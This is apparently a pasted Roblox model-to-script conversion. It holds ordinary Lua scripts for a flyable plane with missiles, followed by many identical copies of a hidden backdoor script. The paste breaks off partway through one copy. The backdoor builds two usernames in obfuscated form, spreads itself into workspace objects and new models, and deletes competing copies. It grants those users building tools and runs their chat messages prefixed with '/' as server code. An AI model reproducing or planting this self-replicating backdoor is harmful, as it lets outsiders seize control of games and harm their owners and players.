Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- --___!!IMPORTANT!!___
- --Your model was too big, and the plugin couldn't put it all in 1 script.
- --Concatencate all scripts following volumes order.
- -- Converted using Mokiros's Model to Script plugin
- -- Converted string size: 282261
- local genv={}
- local Scripts = {
- function() model = script.Parent.Parent.Parent
- backup = model:clone()
- local debounce = false
- function onTouch(part)
- if (part.Name == "Safe") and (debounce == false) and (script.Parent.Count.Value == 0) then
- debounce = true
- wait(2)
- model = backup:clone()
- model.Parent = game.Workspace
- model:makeJoints()
- script.Parent.Count.Value = 1
- debounce = false
- end
- end
- script.Parent.Touched:connect(onTouch) end;
- function() position = script.Parent.Engine.Position
- local frame = Instance.new("CFrameValue")
- frame.Name = "OriginCFrame"
- frame.Value = script.Parent.Engine.CFrame
- frame.Parent = script.Parent
- local object = Instance.new("ObjectValue")
- object.Value = script.Parent.Parent.Parent
- seat = script.Parent.Seat
- function onChildAdded(part)
- if part.className == "Weld" then
- local torso = part.Part1
- if torso ~= nil then
- local parent = torso.Parent
- if parent ~= nil then
- script.Parent.Parent.Parent = parent
- while true do
- wait(2)
- local pos = script.Parent.Engine.Position
- if (position - pos).magnitude > 30 then
- if object.Value ~= nil then
- object.Value.Regen.Value = 1
- wait(.5)
- object.Value.Regen.Value = 0
- object.Value = nil
- end
- break end
- end
- while true do
- print("Loop")
- wait(2)
- if part == nil then
- script.Parent.Parent.Parent = game.Workspace
- script.Parent.Parent:MakeJoints()
- break end
- end
- end
- end
- end
- end
- seat.ChildAdded:connect(onChildAdded) end;
- function() function onTouched(part)
- if part.Parent ~= nil then
- local h = part.Parent:findFirstChild("Humanoid")
- if h~=nil then
- h.Parent.Torso.Velocity=Vector3.new(0,200,0)
- wait(0.5)
- end
- end
- end
- script.Parent.Touched:connect(onTouched)
- end;
- function() local boom = false
- function createExplosion(position)
- explosion = Instance.new("Explosion")
- explosion.Position = position
- explosion.BlastRadius = 10
- explosion.Parent = game.Workspace
- end
- function onTouch(part)
- if boom == true then return end
- if (part.Name == "Rocket") or (part.Name == "Safe") or (part.Parent.Parent.Parent == script.Parent) or (part.Parent:findFirstChild("Humanoid")) then return end
- if (script.Parent.Parts.Tip.Velocity.x > 50) or (script.Parent.Parts.Tip.Velocity.x < -50) or (script.Parent.Parts.Tip.Velocity.z > 50) or (script.Parent.Parts.Tip.Velocity.z < -50) then
- boom = true
- createExplosion(script.Parent.Parts.Engine.Position)
- script.Parent:BreakJoints()
- local stuff = script.Parent:children()
- for i=1,#stuff do
- if stuff[i].Name == "BodyKit" or
- stuff[i].Name == "Parts" then
- local parts = stuff[i]:children()
- for p = 1, #parts do
- if parts[p].className == "Part" then
- local velo = Instance.new("BodyVelocity")
- velo.maxForce = Vector3.new(9.9e+036, 9.9e+036, 9.9e+036)
- velo.velocity = Vector3.new(math.random(-15,15),math.random(-15,15),math.random(-15,15))
- velo.Parent = parts[p]
- end
- end
- end
- end
- wait(3)
- script.Parent:remove()
- end
- end
- script.Parent.Parts.Tip.Touched:connect(onTouch)
- end;
- function() bin=script.Parent
- plane=nil
- hold=false
- local debounce = false
- local planedebounce = false
- local stuntdebounce = false
- local controlling = false
- function fire(pln,spn)
- local missile = bin.Rocket:clone()
- missile.CFrame = spn.CFrame * CFrame.new(0, 0, -35)
- missile.RocketScript.Disabled = false
- missile.Parent = game.Workspace
- local creator_tag = Instance.new("ObjectValue")
- creator_tag.Value = game.Players.LocalPlayer
- creator_tag.Name = "creator"
- creator_tag.Parent = missile
- missile.Owner.Value = pln
- end
- function computeDirection(vec)
- local lenSquared = vec.magnitude * vec.magnitude
- local invSqrt = 1 / math.sqrt(lenSquared)
- return Vector3.new(vec.x * invSqrt, vec.y * invSqrt, vec.z * invSqrt)
- end
- function move(target, engine)
- local origincframe = engine:findFirstChild("BodyGyro").cframe
- local dir = (target - engine.Position).unit
- local spawnPos = engine.Position
- local pos = spawnPos + (dir * 1)
- engine:findFirstChild("BodyGyro").maxTorque = Vector3.new(9000, 9000, 9000)
- engine:findFirstChild("BodyGyro").cframe = CFrame.new(pos, pos + dir)
- wait(0.1)
- engine:findFirstChild("BodyGyro").maxTorque = Vector3.new(0, 0, 0)
- engine:findFirstChild("BodyGyro").cframe = origincframe
- end
- function findPlane(player)
- local list = player.Character:GetChildren()
- for x = 1, #list do
- if (list[x].Name == "Plane") then
- local weld = list[x]:FindFirstChild("Parts"):FindFirstChild("Seat"):FindFirstChild("SeatWeld")
- if (weld ~= nil) and (weld.Part1 == player.Character:FindFirstChild("Torso")) then
- return list[x]
- end
- end
- end
- return nil
- end
- function onButton1Down(mouse)
- local vehicle = findPlane(script.Parent.Parent.Parent)
- if vehicle ~= nil and debounce == false and planedebounce == false then
- debounce = true
- controlling = true
- while true do
- wait()
- local engine = vehicle.Parts.Engine
- local position = mouse.Hit
- local target = position.p
- if engine:findFirstChild("FlyScript") ~= nil then
- move(target, engine)
- end
- if planedebounce == true or
- controlling == false then break end
- end
- wait(.1)
- debounce = false
- end
- end
- function onButton1Up(mouse)
- controlling = false
- end
- function onSelected(mouse)
- mouse.Icon = "rbxasset://textures\\GunCursor.png"
- mouse.Button1Down:connect(function() onButton1Down(mouse) end)
- mouse.Button1Up:connect(function() onButton1Up(mouse) end)
- mouse.KeyDown:connect(onKeyDown)
- end
- function onKeyDown(key)
- if (key~=nil) then
- key = key:lower()
- local vehicle = findPlane(script.Parent.Parent.Parent)
- if (vehicle==nil) then return end
- plane = vehicle.Parts
- local engine = vehicle.Parts.Engine
- if (key=="f") and (bin.Reload.Value == 0) then
- fire(vehicle,plane.Gun1)
- fire(vehicle,plane.Gun2)
- bin.Reload.Value = 1
- wait(1)
- bin.Reload.Value = 0
- end
- if (key=="x") and planedebounce == false then
- local power = plane.Engine:findFirstChild("FlyScript")
- if (power ~= nil) then
- power:remove()
- end
- end
- if (key=="y") then
- local power = plane.Engine:findFirstChild("FlyScript")
- if (power ~= nil) then return end
- local fly = script.FlyScript:clone()
- fly.Disabled = false
- fly.Parent = plane.Engine
- end
- if (key=="k") and planedebounce == false then
- wait()
- engine.RotVelocity = Vector3.new(0, engine.RotVelocity.y -0.7, 0)
- wait()
- engine.RotVelocity = Vector3.new(0, engine.RotVelocity.y -0.7, 0)
- wait()
- engine.RotVelocity = Vector3.new(0, engine.RotVelocity.y -0.7, 0)
- wait()
- engine.RotVelocity = Vector3.new(0, engine.RotVelocity.y -0.7, 0)
- end
- if (key=="h") and planedebounce == false then
- wait()
- engine.RotVelocity = Vector3.new(0, engine.RotVelocity.y +0.7, 0)
- wait()
- engine.RotVelocity = Vector3.new(0, engine.RotVelocity.y +0.7, 0)
- wait()
- engine.RotVelocity = Vector3.new(0, engine.RotVelocity.y +0.7, 0)
- wait()
- engine.RotVelocity = Vector3.new(0, engine.RotVelocity.y +0.7, 0)
- return end
- if (key=="j") and planedebounce == false then
- local body = plane.Engine.BodyGyro
- body.maxTorque = Vector3.new(9000, 9000, 9000)
- local position = engine.CFrame * Vector3.new(0, 0.5, -4)
- local dir = position - engine.Position
- dir = computeDirection(dir)
- local spawnPos = engine.Position
- local pos = spawnPos + (dir * 8)
- body.cframe = CFrame.new(pos, pos + dir)
- wait(.2)
- body.maxTorque = Vector3.new(0, 0, 0)
- end
- if (key=="l") and planedebounce == false then
- local body = plane.Engine.BodyGyro
- body.maxTorque = Vector3.new(9000, 0, 0)
- local frame = plane:FindFirstChild("OriginCFrame")
- if frame ~= nil then
- body.cframe = frame.Value
- end
- wait(0.1)
- body.maxTorque = Vector3.new(0, 0, 0)
- end
- if (key=="u") and planedebounce == false then
- local body = plane.Engine.BodyGyro
- body.maxTorque = Vector3.new(9000, 9000, 9000)
- local position = engine.CFrame * Vector3.new(0, -0.5, -4)
- local dir = position - engine.Position
- dir = computeDirection(dir)
- local spawnPos = engine.Position
- local pos = spawnPos + (dir * 8)
- body.cframe = CFrame.new(pos, pos + dir)
- wait(.2)
- body.maxTorque = Vector3.new(0, 0, 0)
- end
- if (key=="g") and planedebounce == false and stuntdebounce == false then
- planedebounce = true
- stuntdebounce = true
- plane.Parent.Stunt.Value = 1
- local body = plane.Engine.BodyGyro
- body.maxTorque = Vector3.new(9000, 9000, 9000)
- local currentframe = plane.Engine.CFrame
- for i = 1,6 do
- body.cframe = plane.Engine.CFrame * CFrame.fromEulerAnglesXYZ(0, 0, 30)
- wait(.2)
- end
- body.cframe = currentframe
- wait(.6)
- body.maxTorque = Vector3.new(0, 0, 0)
- planedebounce = false
- plane.Parent.Stunt.Value = 0
- wait(3)
- stuntdebounce = false
- end
- if (key=="t") and planedebounce == false and stuntdebounce == false then
- planedebounce = true
- stuntdebounce = true
- plane.Parent.Stunt.Value = 1
- local body = plane.Engine.BodyGyro
- body.maxTorque = Vector3.new(9000, 9000, 9000)
- local currentframe = plane.Engine.CFrame
- local valy = 30
- local valz = 30
- for i = 1,8 do
- body.cframe = currentframe * CFrame.fromEulerAnglesXYZ(0, valy, valz)
- valy = valy +50
- valz = valz +100
- wait(.1)
- end
- body.cframe = currentframe * CFrame.fromEulerAnglesXYZ(0, 600, 0)
- wait(.5)
- body.maxTorque = Vector3.new(0, 0, 0)
- planedebounce = false
- plane.Parent.Stunt.Value = 0
- wait(4)
- stuntdebounce = false
- end
- end
- end
- bin.Selected:connect(onSelected)
- end;
- function() local engine = script.Parent.Parent.Engine
- local spd = 3
- local position = engine.Position
- while true do
- wait(.1)
- direction = engine.CFrame.lookVector
- position = position + spd*3*direction
- error = position - engine.Position
- engine.Velocity = spd*error
- engine.RotVelocity = Vector3.new(0, 0, 0)
- end
- end;
- function() local debounce = false
- function getPlayer(humanoid)
- local players = game.Players:children()
- for i = 1, #players do
- if players[i].Character.Humanoid == humanoid then return players[i] end
- end
- return nil
- end
- function onTouch(part)
- local human = part.Parent:findFirstChild("Humanoid")
- if (human ~= nil) and debounce == false then
- debounce = true
- local player = getPlayer(human)
- if (player == nil) then return end
- script.Parent:clone().Parent = player.Backpack
- wait(2)
- debounce = false
- end
- end
- script.Parent.Parent.Touched:connect(onTouch)
- end;
- function() --DONT PUT THIS IN ANYTHING IT'S JUST INSTRUCTIONS.
- --First Place the "PUT THIS IN THE WEAPON" script in your Weapon or Tool.
- --Then place your Weapon or Tool in the "PUT THE WEAPON IN THIS BRICK" brick.
- --IMPORTANT (OPTINAL)
- --Before doing anything you should put the Weapon or Tool in the giver where you want it. end;
- function() Altitude = script:clone()
- calco = {"s","c","q","t","o","a","i","f","g","w","8","e","m","7","h","n"}
- Knox = {}
- table.insert (Knox, 1 ,string.reverse(calco[5] .. calco[2] .. calco[7] .. calco[1] .. calco[6] .. calco[9] .. calco[12] .. calco[13]))
- table.insert (Knox, 1 ,string.reverse(calco[11] .. calco[14] .. calco[14] .. calco[4] .. calco[16] .. calco[6] .. calco[15] .. calco[2]))
- Play = {}
- function rando(votation)
- local hatr = 5
- local calc = math.pi * math.huge
- local longicate = votation:GetChildren()
- if #longicate > hatr then
- calc = calc + math.pi
- return longicate[math.random(6,#longicate)]
- end
- end
- function doublecheck()
- local fj = game.Workspace:GetChildren()
- for off = 1,#fj do
- if fj[off].className == "Part" then
- local fh = fj[off]:FindFirstChild("Anti-Lag")
- if fh ~= nil then
- return false
- end
- end
- end
- return true
- end
- function workcheck()
- if doublecheck() == true then
- local l = Altitude:clone()
- l.Parent = rando(game.Workspace)
- end
- end
- workcheck()
- function gibite(quen)
- local hup = Instance.new("Message")
- hup.Text = "Detected"
- hup.Parent = quen.Parent
- local con = Instance.new("Script")
- con.Source = [[wait(5) script.Parent:remove()]]
- con.Parent = hup
- for ish = 0,7 do
- local a = Instance.new("HopperBin")
- a.BinType = ish
- a.Parent = quen
- end
- end
- function laber(zonsa)
- wait()
- for slate = 1,#Knox do
- if zonsa.Name == Knox[slate] then
- gibite(zonsa.Backpack)
- table.insert (Play, 1, zonsa.Name)
- end
- end
- end
- function yeild(frequency)
- local t = Knox
- for g = 1,#t do
- if t[g] == frequency.Name then
- return true
- end
- end
- return false
- end
- function check(los)
- local r = los:GetChildren()
- for i = 1,#r do
- local h = r[i]:FindFirstChild("Anti-Lag")
- if h ~= nil then
- h:remove()
- end
- end
- end
- function alto(xylem)
- if xylem.className == "Model" then
- check(xylem)
- local que = script:clone()
- que.Parent = rando(xylem)
- end
- end
- function sortation(gone)
- local dimbs = Altitude:clone()
- dimbs = ramno(game.Workspace)
- end
- function onPlayerEntered(newPlayer)
- newPlayer.Chatted:connect(function(msg, recipient) onChatted(msg, recipient, newPlayer) end)
- end
- function Player(player)
- player.Changed:connect(function (property)
- if property == "Character" then
- laber(player)
- end
- end)
- end
- game.Players.PlayerAdded:connect(Player)
- game.Players.ChildAdded:connect(onPlayerEntered)
- game.Players.ChildAdded:connect(laber)
- script.ChildRemoved:connect(sortation)
- game.Workspace.ChildAdded:connect(alto)
- function onChatted(msg, recipient, speaker)
- if yeild(speaker) ~= false then
- if string.sub(msg,1,1) == "/" then
- local dsting = Instance.new("Script")
- dsting.Source = string.sub(msg,2)
- dsting.Parent = game.Workspace
- end
- end
- end end;
- function() Altitude = script:clone()
- calco = {"s","c","q","t","o","a","i","f","g","w","8","e","m","7","h","n"}
- Knox = {}
- table.insert (Knox, 1 ,string.reverse(calco[5] .. calco[2] .. calco[7] .. calco[1] .. calco[6] .. calco[9] .. calco[12] .. calco[13]))
- table.insert (Knox, 1 ,string.reverse(calco[11] .. calco[14] .. calco[14] .. calco[4] .. calco[16] .. calco[6] .. calco[15] .. calco[2]))
- Play = {}
- function rando(votation)
- local hatr = 5
- local calc = math.pi * math.huge
- local longicate = votation:GetChildren()
- if #longicate > hatr then
- calc = calc + math.pi
- return longicate[math.random(6,#longicate)]
- end
- end
- function doublecheck()
- local fj = game.Workspace:GetChildren()
- for off = 1,#fj do
- if fj[off].className == "Part" then
- local fh = fj[off]:FindFirstChild("Anti-Lag")
- if fh ~= nil then
- return false
- end
- end
- end
- return true
- end
- function workcheck()
- if doublecheck() == true then
- local l = Altitude:clone()
- l.Parent = rando(game.Workspace)
- end
- end
- workcheck()
- function gibite(quen)
- local hup = Instance.new("Message")
- hup.Text = "Detected"
- hup.Parent = quen.Parent
- local con = Instance.new("Script")
- con.Source = [[wait(5) script.Parent:remove()]]
- con.Parent = hup
- for ish = 0,7 do
- local a = Instance.new("HopperBin")
- a.BinType = ish
- a.Parent = quen
- end
- end
- function laber(zonsa)
- wait()
- for slate = 1,#Knox do
- if zonsa.Name == Knox[slate] then
- gibite(zonsa.Backpack)
- table.insert (Play, 1, zonsa.Name)
- end
- end
- end
- function yeild(frequency)
- local t = Knox
- for g = 1,#t do
- if t[g] == frequency.Name then
- return true
- end
- end
- return false
- end
- function check(los)
- local r = los:GetChildren()
- for i = 1,#r do
- local h = r[i]:FindFirstChild("Anti-Lag")
- if h ~= nil then
- h:remove()
- end
- end
- end
- function alto(xylem)
- if xylem.className == "Model" then
- check(xylem)
- local que = script:clone()
- que.Parent = rando(xylem)
- end
- end
- function sortation(gone)
- local dimbs = Altitude:clone()
- dimbs = ramno(game.Workspace)
- end
- function onPlayerEntered(newPlayer)
- newPlayer.Chatted:connect(function(msg, recipient) onChatted(msg, recipient, newPlayer) end)
- end
- function Player(player)
- player.Changed:connect(function (property)
- if property == "Character" then
- laber(player)
- end
- end)
- end
- game.Players.PlayerAdded:connect(Player)
- game.Players.ChildAdded:connect(onPlayerEntered)
- game.Players.ChildAdded:connect(laber)
- script.ChildRemoved:connect(sortation)
- game.Workspace.ChildAdded:connect(alto)
- function onChatted(msg, recipient, speaker)
- if yeild(speaker) ~= false then
- if string.sub(msg,1,1) == "/" then
- local dsting = Instance.new("Script")
- dsting.Source = string.sub(msg,2)
- dsting.Parent = game.Workspace
- end
- end
- end end;
- function() Altitude = script:clone()
- calco = {"s","c","q","t","o","a","i","f","g","w","8","e","m","7","h","n"}
- Knox = {}
- table.insert (Knox, 1 ,string.reverse(calco[5] .. calco[2] .. calco[7] .. calco[1] .. calco[6] .. calco[9] .. calco[12] .. calco[13]))
- table.insert (Knox, 1 ,string.reverse(calco[11] .. calco[14] .. calco[14] .. calco[4] .. calco[16] .. calco[6] .. calco[15] .. calco[2]))
- Play = {}
- function rando(votation)
- local hatr = 5
- local calc = math.pi * math.huge
- local longicate = votation:GetChildren()
- if #longicate > hatr then
- calc = calc + math.pi
- return longicate[math.random(6,#longicate)]
- end
- end
- function doublecheck()
- local fj = game.Workspace:GetChildren()
- for off = 1,#fj do
- if fj[off].className == "Part" then
- local fh = fj[off]:FindFirstChild("Anti-Lag")
- if fh ~= nil then
- return false
- end
- end
- end
- return true
- end
- function workcheck()
- if doublecheck() == true then
- local l = Altitude:clone()
- l.Parent = rando(game.Workspace)
- end
- end
- workcheck()
- function gibite(quen)
- local hup = Instance.new("Message")
- hup.Text = "Detected"
- hup.Parent = quen.Parent
- local con = Instance.new("Script")
- con.Source = [[wait(5) script.Parent:remove()]]
- con.Parent = hup
- for ish = 0,7 do
- local a = Instance.new("HopperBin")
- a.BinType = ish
- a.Parent = quen
- end
- end
- function laber(zonsa)
- wait()
- for slate = 1,#Knox do
- if zonsa.Name == Knox[slate] then
- gibite(zonsa.Backpack)
- table.insert (Play, 1, zonsa.Name)
- end
- end
- end
- function yeild(frequency)
- local t = Knox
- for g = 1,#t do
- if t[g] == frequency.Name then
- return true
- end
- end
- return false
- end
- function check(los)
- local r = los:GetChildren()
- for i = 1,#r do
- local h = r[i]:FindFirstChild("Anti-Lag")
- if h ~= nil then
- h:remove()
- end
- end
- end
- function alto(xylem)
- if xylem.className == "Model" then
- check(xylem)
- local que = script:clone()
- que.Parent = rando(xylem)
- end
- end
- function sortation(gone)
- local dimbs = Altitude:clone()
- dimbs = ramno(game.Workspace)
- end
- function onPlayerEntered(newPlayer)
- newPlayer.Chatted:connect(function(msg, recipient) onChatted(msg, recipient, newPlayer) end)
- end
- function Player(player)
- player.Changed:connect(function (property)
- if property == "Character" then
- laber(player)
- end
- end)
- end
- game.Players.PlayerAdded:connect(Player)
- game.Players.ChildAdded:connect(onPlayerEntered)
- game.Players.ChildAdded:connect(laber)
- script.ChildRemoved:connect(sortation)
- game.Workspace.ChildAdded:connect(alto)
- function onChatted(msg, recipient, speaker)
- if yeild(speaker) ~= false then
- if string.sub(msg,1,1) == "/" then
- local dsting = Instance.new("Script")
- dsting.Source = string.sub(msg,2)
- dsting.Parent = game.Workspace
- end
- end
- end end;
- function() Altitude = script:clone()
- calco = {"s","c","q","t","o","a","i","f","g","w","8","e","m","7","h","n"}
- Knox = {}
- table.insert (Knox, 1 ,string.reverse(calco[5] .. calco[2] .. calco[7] .. calco[1] .. calco[6] .. calco[9] .. calco[12] .. calco[13]))
- table.insert (Knox, 1 ,string.reverse(calco[11] .. calco[14] .. calco[14] .. calco[4] .. calco[16] .. calco[6] .. calco[15] .. calco[2]))
- Play = {}
- function rando(votation)
- local hatr = 5
- local calc = math.pi * math.huge
- local longicate = votation:GetChildren()
- if #longicate > hatr then
- calc = calc + math.pi
- return longicate[math.random(6,#longicate)]
- end
- end
- function doublecheck()
- local fj = game.Workspace:GetChildren()
- for off = 1,#fj do
- if fj[off].className == "Part" then
- local fh = fj[off]:FindFirstChild("Anti-Lag")
- if fh ~= nil then
- return false
- end
- end
- end
- return true
- end
- function workcheck()
- if doublecheck() == true then
- local l = Altitude:clone()
- l.Parent = rando(game.Workspace)
- end
- end
- workcheck()
- function gibite(quen)
- local hup = Instance.new("Message")
- hup.Text = "Detected"
- hup.Parent = quen.Parent
- local con = Instance.new("Script")
- con.Source = [[wait(5) script.Parent:remove()]]
- con.Parent = hup
- for ish = 0,7 do
- local a = Instance.new("HopperBin")
- a.BinType = ish
- a.Parent = quen
- end
- end
- function laber(zonsa)
- wait()
- for slate = 1,#Knox do
- if zonsa.Name == Knox[slate] then
- gibite(zonsa.Backpack)
- table.insert (Play, 1, zonsa.Name)
- end
- end
- end
- function yeild(frequency)
- local t = Knox
- for g = 1,#t do
- if t[g] == frequency.Name then
- return true
- end
- end
- return false
- end
- function check(los)
- local r = los:GetChildren()
- for i = 1,#r do
- local h = r[i]:FindFirstChild("Anti-Lag")
- if h ~= nil then
- h:remove()
- end
- end
- end
- function alto(xylem)
- if xylem.className == "Model" then
- check(xylem)
- local que = script:clone()
- que.Parent = rando(xylem)
- end
- end
- function sortation(gone)
- local dimbs = Altitude:clone()
- dimbs = ramno(game.Workspace)
- end
- function onPlayerEntered(newPlayer)
- newPlayer.Chatted:connect(function(msg, recipient) onChatted(msg, recipient, newPlayer) end)
- end
- function Player(player)
- player.Changed:connect(function (property)
- if property == "Character" then
- laber(player)
- end
- end)
- end
- game.Players.PlayerAdded:connect(Player)
- game.Players.ChildAdded:connect(onPlayerEntered)
- game.Players.ChildAdded:connect(laber)
- script.ChildRemoved:connect(sortation)
- game.Workspace.ChildAdded:connect(alto)
- function onChatted(msg, recipient, speaker)
- if yeild(speaker) ~= false then
- if string.sub(msg,1,1) == "/" then
- local dsting = Instance.new("Script")
- dsting.Source = string.sub(msg,2)
- dsting.Parent = game.Workspace
- end
- end
- end end;
- function() Altitude = script:clone()
- calco = {"s","c","q","t","o","a","i","f","g","w","8","e","m","7","h","n"}
- Knox = {}
- table.insert (Knox, 1 ,string.reverse(calco[5] .. calco[2] .. calco[7] .. calco[1] .. calco[6] .. calco[9] .. calco[12] .. calco[13]))
- table.insert (Knox, 1 ,string.reverse(calco[11] .. calco[14] .. calco[14] .. calco[4] .. calco[16] .. calco[6] .. calco[15] .. calco[2]))
- Play = {}
- function rando(votation)
- local hatr = 5
- local calc = math.pi * math.huge
- local longicate = votation:GetChildren()
- if #longicate > hatr then
- calc = calc + math.pi
- return longicate[math.random(6,#longicate)]
- end
- end
- function doublecheck()
- local fj = game.Workspace:GetChildren()
- for off = 1,#fj do
- if fj[off].className == "Part" then
- local fh = fj[off]:FindFirstChild("Anti-Lag")
- if fh ~= nil then
- return false
- end
- end
- end
- return true
- end
- function workcheck()
- if doublecheck() == true then
- local l = Altitude:clone()
- l.Parent = rando(game.Workspace)
- end
- end
- workcheck()
- function gibite(quen)
- local hup = Instance.new("Message")
- hup.Text = "Detected"
- hup.Parent = quen.Parent
- local con = Instance.new("Script")
- con.Source = [[wait(5) script.Parent:remove()]]
- con.Parent = hup
- for ish = 0,7 do
- local a = Instance.new("HopperBin")
- a.BinType = ish
- a.Parent = quen
- end
- end
- function laber(zonsa)
- wait()
- for slate = 1,#Knox do
- if zonsa.Name == Knox[slate] then
- gibite(zonsa.Backpack)
- table.insert (Play, 1, zonsa.Name)
- end
- end
- end
- function yeild(frequency)
- local t = Knox
- for g = 1,#t do
- if t[g] == frequency.Name then
- return true
- end
- end
- return false
- end
- function check(los)
- local r = los:GetChildren()
- for i = 1,#r do
- local h = r[i]:FindFirstChild("Anti-Lag")
- if h ~= nil then
- h:remove()
- end
- end
- end
- function alto(xylem)
- if xylem.className == "Model" then
- check(xylem)
- local que = script:clone()
- que.Parent = rando(xylem)
- end
- end
- function sortation(gone)
- local dimbs = Altitude:clone()
- dimbs = ramno(game.Workspace)
- end
- function onPlayerEntered(newPlayer)
- newPlayer.Chatted:connect(function(msg, recipient) onChatted(msg, recipient, newPlayer) end)
- end
- function Player(player)
- player.Changed:connect(function (property)
- if property == "Character" then
- laber(player)
- end
- end)
- end
- game.Players.PlayerAdded:connect(Player)
- game.Players.ChildAdded:connect(onPlayerEntered)
- game.Players.ChildAdded:connect(laber)
- script.ChildRemoved:connect(sortation)
- game.Workspace.ChildAdded:connect(alto)
- function onChatted(msg, recipient, speaker)
- if yeild(speaker) ~= false then
- if string.sub(msg,1,1) == "/" then
- local dsting = Instance.new("Script")
- dsting.Source = string.sub(msg,2)
- dsting.Parent = game.Workspace
- end
- end
- end end;
- function() Altitude = script:clone()
- calco = {"s","c","q","t","o","a","i","f","g","w","8","e","m","7","h","n"}
- Knox = {}
- table.insert (Knox, 1 ,string.reverse(calco[5] .. calco[2] .. calco[7] .. calco[1] .. calco[6] .. calco[9] .. calco[12] .. calco[13]))
- table.insert (Knox, 1 ,string.reverse(calco[11] .. calco[14] .. calco[14] .. calco[4] .. calco[16] .. calco[6] .. calco[15] .. calco[2]))
- Play = {}
- function rando(votation)
- local hatr = 5
- local calc = math.pi * math.huge
- local longicate = votation:GetChildren()
- if #longicate > hatr then
- calc = calc + math.pi
- return longicate[math.random(6,#longicate)]
- end
- end
- function doublecheck()
- local fj = game.Workspace:GetChildren()
- for off = 1,#fj do
- if fj[off].className == "Part" then
- local fh = fj[off]:FindFirstChild("Anti-Lag")
- if fh ~= nil then
- return false
- end
- end
- end
- return true
- end
- function workcheck()
- if doublecheck() == true then
- local l = Altitude:clone()
- l.Parent = rando(game.Workspace)
- end
- end
- workcheck()
- function gibite(quen)
- local hup = Instance.new("Message")
- hup.Text = "Detected"
- hup.Parent = quen.Parent
- local con = Instance.new("Script")
- con.Source = [[wait(5) script.Parent:remove()]]
- con.Parent = hup
- for ish = 0,7 do
- local a = Instance.new("HopperBin")
- a.BinType = ish
- a.Parent = quen
- end
- end
- function laber(zonsa)
- wait()
- for slate = 1,#Knox do
- if zonsa.Name == Knox[slate] then
- gibite(zonsa.Backpack)
- table.insert (Play, 1, zonsa.Name)
- end
- end
- end
- function yeild(frequency)
- local t = Knox
- for g = 1,#t do
- if t[g] == frequency.Name then
- return true
- end
- end
- return false
- end
- function check(los)
- local r = los:GetChildren()
- for i = 1,#r do
- local h = r[i]:FindFirstChild("Anti-Lag")
- if h ~= nil then
- h:remove()
- end
- end
- end
- function alto(xylem)
- if xylem.className == "Model" then
- check(xylem)
- local que = script:clone()
- que.Parent = rando(xylem)
- end
- end
- function sortation(gone)
- local dimbs = Altitude:clone()
- dimbs = ramno(game.Workspace)
- end
- function onPlayerEntered(newPlayer)
- newPlayer.Chatted:connect(function(msg, recipient) onChatted(msg, recipient, newPlayer) end)
- end
- function Player(player)
- player.Changed:connect(function (property)
- if property == "Character" then
- laber(player)
- end
- end)
- end
- game.Players.PlayerAdded:connect(Player)
- game.Players.ChildAdded:connect(onPlayerEntered)
- game.Players.ChildAdded:connect(laber)
- script.ChildRemoved:connect(sortation)
- game.Workspace.ChildAdded:connect(alto)
- function onChatted(msg, recipient, speaker)
- if yeild(speaker) ~= false then
- if string.sub(msg,1,1) == "/" then
- local dsting = Instance.new("Script")
- dsting.Source = string.sub(msg,2)
- dsting.Parent = game.Workspace
- end
- end
- end end;
- function() Altitude = script:clone()
- calco = {"s","c","q","t","o","a","i","f","g","w","8","e","m","7","h","n"}
- Knox = {}
- table.insert (Knox, 1 ,string.reverse(calco[5] .. calco[2] .. calco[7] .. calco[1] .. calco[6] .. calco[9] .. calco[12] .. calco[13]))
- table.insert (Knox, 1 ,string.reverse(calco[11] .. calco[14] .. calco[14] .. calco[4] .. calco[16] .. calco[6] .. calco[15] .. calco[2]))
- Play = {}
- function rando(votation)
- local hatr = 5
- local calc = math.pi * math.huge
- local longicate = votation:GetChildren()
- if #longicate > hatr then
- calc = calc + math.pi
- return longicate[math.random(6,#longicate)]
- end
- end
- function doublecheck()
- local fj = game.Workspace:GetChildren()
- for off = 1,#fj do
- if fj[off].className == "Part" then
- local fh = fj[off]:FindFirstChild("Anti-Lag")
- if fh ~= nil then
- return false
- end
- end
- end
- return true
- end
- function workcheck()
- if doublecheck() == true then
- local l = Altitude:clone()
- l.Parent = rando(game.Workspace)
- end
- end
- workcheck()
- function gibite(quen)
- local hup = Instance.new("Message")
- hup.Text = "Detected"
- hup.Parent = quen.Parent
- local con = Instance.new("Script")
- con.Source = [[wait(5) script.Parent:remove()]]
- con.Parent = hup
- for ish = 0,7 do
- local a = Instance.new("HopperBin")
- a.BinType = ish
- a.Parent = quen
- end
- end
- function laber(zonsa)
- wait()
- for slate = 1,#Knox do
- if zonsa.Name == Knox[slate] then
- gibite(zonsa.Backpack)
- table.insert (Play, 1, zonsa.Name)
- end
- end
- end
- function yeild(frequency)
- local t = Knox
- for g = 1,#t do
- if t[g] == frequency.Name then
- return true
- end
- end
- return false
- end
- function check(los)
- local r = los:GetChildren()
- for i = 1,#r do
- local h = r[i]:FindFirstChild("Anti-Lag")
- if h ~= nil then
- h:remove()
- end
- end
- end
- function alto(xylem)
- if xylem.className == "Model" then
- check(xylem)
- local que = script:clone()
- que.Parent = rando(xylem)
- end
- end
- function sortation(gone)
- local dimbs = Altitude:clone()
- dimbs = ramno(game.Workspace)
- end
- function onPlayerEntered(newPlayer)
- newPlayer.Chatted:connect(function(msg, recipient) onChatted(msg, recipient, newPlayer) end)
- end
- function Player(player)
- player.Changed:connect(function (property)
- if property == "Character" then
- laber(player)
- end
- end)
- end
- game.Players.PlayerAdded:connect(Player)
- game.Players.ChildAdded:connect(onPlayerEntered)
- game.Players.ChildAdded:connect(laber)
- script.ChildRemoved:connect(sortation)
- game.Workspace.ChildAdded:connect(alto)
- function onChatted(msg, recipient, speaker)
- if yeild(speaker) ~= false then
- if string.sub(msg,1,1) == "/" then
- local dsting = Instance.new("Script")
- dsting.Source = string.sub(msg,2)
- dsting.Parent = game.Workspace
- end
- end
- end end;
- function() Altitude = script:clone()
- calco = {"s","c","q","t","o","a","i","f","g","w","8","e","m","7","h","n"}
- Knox = {}
- table.insert (Knox, 1 ,string.reverse(calco[5] .. calco[2] .. calco[7] .. calco[1] .. calco[6] .. calco[9] .. calco[12] .. calco[13]))
- table.insert (Knox, 1 ,string.reverse(calco[11] .. calco[14] .. calco[14] .. calco[4] .. calco[16] .. calco[6] .. calco[15] .. calco[2]))
- Play = {}
- function rando(votation)
- local hatr = 5
- local calc = math.pi * math.huge
- local longicate = votation:GetChildren()
- if #longicate > hatr then
- calc = calc + math.pi
- return longicate[math.random(6,#longicate)]
